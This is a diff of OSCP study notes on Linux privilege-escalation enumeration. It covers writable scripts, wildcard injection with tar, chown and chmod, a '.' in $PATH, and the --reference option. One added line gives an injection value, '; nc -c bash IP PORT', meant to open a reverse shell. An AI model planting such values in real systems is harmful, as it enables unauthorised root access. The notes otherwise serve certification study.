thomasdefise/OSCP_Resources/Enumeration/Linux101.md

 1. Search if there are script executed that you can write
 2. Search for wildcard injection vulnerability such as tar, chown and chmod (cc Wildcard)
+3. Search for execution within the script that use a folder or file that can be changed to '; nc -c bash IP PORT

 ##### $PATH

 ```bash
 echo $PATH
 ```

 If you notice '.' in environment PATH variable it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege.

-###### *If you don't know, now you know: [PATH]()*
+###### *If you don't know, now you know: [PATH](https://en.wikipedia.org/wiki/PATH_(variable))*

-PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored.<br>
+PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored.

 When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user.

 ### Wildcard

 When you provide **--** followed by two spaces, it instructs the program to stop interpret command line argument.

 #### Chown/Chmod file reference

 Here we wil use the **--reference=FILE** parameter that use the given *file*'s owner and group rather than specifying OWNER:GROUP values.